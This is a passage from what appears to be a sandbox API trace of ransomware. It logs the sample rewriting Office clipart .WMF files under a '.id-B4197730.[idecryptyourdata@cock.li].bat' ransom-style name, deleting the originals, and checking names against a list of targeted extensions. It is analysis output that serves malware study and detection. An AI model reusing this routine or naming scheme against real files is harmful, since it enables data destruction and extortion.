(lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 68 [0062.026] lstrlenW (lpString=".jpg") returned 4 [0062.026] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.026] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.026] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.026] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01184_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0062.026] GetLastError () returned 0x0 [0062.026] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xea2, lpOverlapped=0x0) returned 1 [0062.028] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xeb0, lpOverlapped=0x0) returned 1 [0062.029] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0062.029] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0062.029] SetEndOfFile (hFile=0x340) returned 1 [0062.029] CloseHandle (hObject=0x340) returned 1 [0062.030] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.030] SetEndOfFile (hFile=0x344) returned 1 [0062.031] CloseHandle (hObject=0x344) returned 1 [0062.031] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.031] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01184_.wmf")) returned 1 [0062.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 68 [0062.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 68 [0062.032] lstrlenW (lpString=".doc") returned 4 [0062.032] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.032] lstrlenW (lpString=".docx") returned 5 [0062.032] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.032] lstrlenW (lpString=".pdf") returned 4 [0062.032] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.032] lstrlenW (lpString=".xls") returned 4 [0062.032] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.032] lstrlenW (lpString=".xlsx") returned 5 [0062.032] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.032] lstrlenW (lpString=".ppt") returned 4 [0062.032] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 68 [0062.032] lstrlenW (lpString=".zip") returned 4 [0062.032] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.032] lstrlenW (lpString=".rar") returned 4 [0062.032] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.032] lstrlenW (lpString=".bz2") returned 4 [0062.032] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.032] lstrlenW (lpString=".7z") returned 3 [0062.032] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 68 [0062.032] lstrlenW (lpString=".dbf") returned 4 [0062.032] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 68 [0062.032] lstrlenW (lpString=".1cd") returned 4 [0062.032] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 68 [0062.032] lstrlenW (lpString=".jpg") returned 4 [0062.033] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.033] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.033] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01216_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0062.033] GetLastError () returned 0x0 [0062.033] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x16cc, lpOverlapped=0x0) returned 1 [0062.052] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x16d0, lpOverlapped=0x0) returned 1 [0062.053] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0062.053] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0062.053] SetEndOfFile (hFile=0x340) returned 1 [0062.053] CloseHandle (hObject=0x340) returned 1 [0062.053] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.054] SetEndOfFile (hFile=0x344) returned 1 [0062.054] CloseHandle (hObject=0x344) returned 1 [0062.054] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.055] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01216_.wmf")) returned 1 [0062.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 68 [0062.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 68 [0062.055] lstrlenW (lpString=".doc") returned 4 [0062.055] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.055] lstrlenW (lpString=".docx") returned 5 [0062.055] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.055] lstrlenW (lpString=".pdf") returned 4 [0062.055] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.055] lstrlenW (lpString=".xls") returned 4 [0062.055] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.055] lstrlenW (lpString=".xlsx") returned 5 [0062.055] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.055] lstrlenW (lpString=".ppt") returned 4 [0062.055] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.055] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 68 [0062.055] lstrlenW (lpString=".zip") returned 4 [0062.055] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.055] lstrlenW (lpString=".rar") returned 4 [0062.055] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.056] lstrlenW (lpString=".bz2") returned 4 [0062.056] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.056] lstrlenW (lpString=".7z") returned 3 [0062.056] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 68 [0062.056] lstrlenW (lpString=".dbf") returned 4 [0062.056] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 68 [0062.056] lstrlenW (lpString=".1cd") returned 4 [0062.056] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 68 [0062.056] lstrlenW (lpString=".jpg") returned 4 [0062.056] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.056] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.056] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.056] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01545_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0062.057] GetLastError () returned 0x0 [0062.057] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1ccc, lpOverlapped=0x0) returned 1 [0062.068] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1cd0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1cd0, lpOverlapped=0x0) returned 1 [0062.068] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0062.068] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0062.069] SetEndOfFile (hFile=0x340) returned 1 [0062.069] CloseHandle (hObject=0x340) returned 1 [0062.069] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.069] SetEndOfFile (hFile=0x344) returned 1 [0062.071] CloseHandle (hObject=0x344) returned 1 [0062.071] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.072] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01545_.wmf")) returned 1 [0062.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 68 [0062.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 68 [0062.072] lstrlenW (lpString=".doc") returned 4 [0062.072] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.072] lstrlenW (lpString=".docx") returned 5 [0062.073] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.073] lstrlenW (lpString=".pdf") returned 4 [0062.073] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.073] lstrlenW (lpString=".xls") returned 4 [0062.073] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.073] lstrlenW (lpString=".xlsx") returned 5 [0062.073] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.073] lstrlenW (lpString=".ppt") returned 4 [0062.073] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 68 [0062.073] lstrlenW (lpString=".zip") returned 4 [0062.073] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.073] lstrlenW (lpString=".rar") returned 4 [0062.073] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.073] lstrlenW (lpString=".bz2") returned 4 [0062.073] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.073] lstrlenW (lpString=".7z") returned 3 [0062.073] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 68 [0062.073] lstrlenW (lpString=".dbf") returned 4 [0062.073] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 68 [0062.073] lstrlenW (lpString=".1cd") returned 4 [0062.073] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 68 [0062.073] lstrlenW (lpString=".jpg") returned 4 [0062.073] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.074] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.074] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02559_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0062.074] GetLastError () returned 0x0 [0062.074] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x19e8, lpOverlapped=0x0) returned 1 [0062.107] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x19f0, lpOverlapped=0x0) returned 1 [0062.108] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0062.108] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0062.108] SetEndOfFile (hFile=0x340) returned 1 [0062.109] CloseHandle (hObject=0x340) returned 1 [0062.109] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.109] SetEndOfFile (hFile=0x344) returned 1 [0062.110] CloseHandle (hObject=0x344) returned 1 [0062.110] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.110] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02559_.wmf")) returned 1 [0062.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 68 [0062.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 68 [0062.111] lstrlenW (lpString=".doc") returned 4 [0062.111] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.111] lstrlenW (lpString=".docx") returned 5 [0062.111] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.111] lstrlenW (lpString=".pdf") returned 4 [0062.111] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.111] lstrlenW (lpString=".xls") returned 4 [0062.111] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.111] lstrlenW (lpString=".xlsx") returned 5 [0062.111] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.111] lstrlenW (lpString=".ppt") returned 4 [0062.111] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 68 [0062.111] lstrlenW (lpString=".zip") returned 4 [0062.111] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.111] lstrlenW (lpString=".rar") returned 4 [0062.111] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.111] lstrlenW (lpString=".bz2") returned 4 [0062.111] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.111] lstrlenW (lpString=".7z") returned 3 [0062.111] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 68 [0062.111] lstrlenW (lpString=".dbf") returned 4 [0062.111] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 68 [0062.111] lstrlenW (lpString=".1cd") returned 4 [0062.111] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 68 [0062.111] lstrlenW (lpString=".jpg") returned 4 [0062.111] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.112] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.112] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an03500_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0062.112] GetLastError () returned 0x0 [0062.112] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x2418, lpOverlapped=0x0) returned 1 [0062.132] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x2420, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x2420, lpOverlapped=0x0) returned 1 [0062.133] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0062.133] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0062.133] SetEndOfFile (hFile=0x340) returned 1 [0062.133] CloseHandle (hObject=0x340) returned 1 [0062.134] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.134] SetEndOfFile (hFile=0x344) returned 1 [0062.135] CloseHandle (hObject=0x344) returned 1 [0062.135] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.135] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an03500_.wmf")) returned 1 [0062.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 68 [0062.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 68 [0062.135] lstrlenW (lpString=".doc") returned 4 [0062.135] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.136] lstrlenW (lpString=".docx") returned 5 [0062.136] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.136] lstrlenW (lpString=".pdf") returned 4 [0062.136] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.136] lstrlenW (lpString=".xls") returned 4 [0062.136] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.136] lstrlenW (lpString=".xlsx") returned 5 [0062.136] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.136] lstrlenW (lpString=".ppt") returned 4 [0062.136] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 68 [0062.136] lstrlenW (lpString=".zip") returned 4 [0062.136] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.136] lstrlenW (lpString=".rar") returned 4 [0062.136] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.136] lstrlenW (lpString=".bz2") returned 4 [0062.136] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.136] lstrlenW (lpString=".7z") returned 3 [0062.136] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 68 [0062.136] lstrlenW (lpString=".dbf") returned 4 [0062.136] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 68 [0062.136] lstrlenW (lpString=".1cd") returned 4 [0062.136] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 68 [0062.136] lstrlenW (lpString=".jpg") returned 4 [0062.136] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.137] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.137] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0062.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04117_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0062.137] GetLastError () returned 0x0 [0062.137] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x17ac, lpOverlapped=0x0) returned 1 [0062.156] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x17b0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x17b0, lpOverlapped=0x0) returned 1 [0062.157] ReadFile (in: hFile=0x344, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0062.157] WriteFile (in: hFile=0x340, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, 